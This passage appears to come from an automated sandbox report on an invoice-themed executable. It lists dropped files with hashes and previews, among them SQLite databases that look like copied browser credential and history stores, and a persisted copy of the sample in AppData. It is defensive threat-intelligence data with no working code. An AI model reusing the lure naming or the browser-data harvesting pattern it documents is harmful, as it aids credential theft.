SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\716900dfd4190a631e366b4248aa942a\msgid.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	very short file (no magic)
Category:	modified
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice-BL. Payment TT $ 28,945.99.exe.log

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SFHAWxtoIpgL.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZLiUyus:lGLHyIFKL3IZ2KRH9Oug4Xs
MD5:	52F0904A64FC9155F29D06C831D2B472
SHA1:	4BCDB36C8C3D9DA459100EFC71147A2C9B8300CA
SHA-256:	35993186A4051DEFC81F2198AAEA784327C4E674279A2903FBBEBB25334BD79D
SHA-512:	7C6FC75ED4D3D84D4C83557EB99720BF1597A7092343C6B1506A518C8D12056D0566B94095559B4E2E689F171BD8043B4ACC38AABC097759F0ADFB63C1127585
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltauug5e.jcl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ph4svqid.gjs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sph5ucap.d0p.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yg1b4rem.l3u.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp144C.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp146D.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp146E.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp147E.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp148F.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp14AF.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp14C0.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp14D0.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp14D1.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp155F.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp157F.tmp.dat

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3F54.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3F74.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3F75.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3F96.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3FA6.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
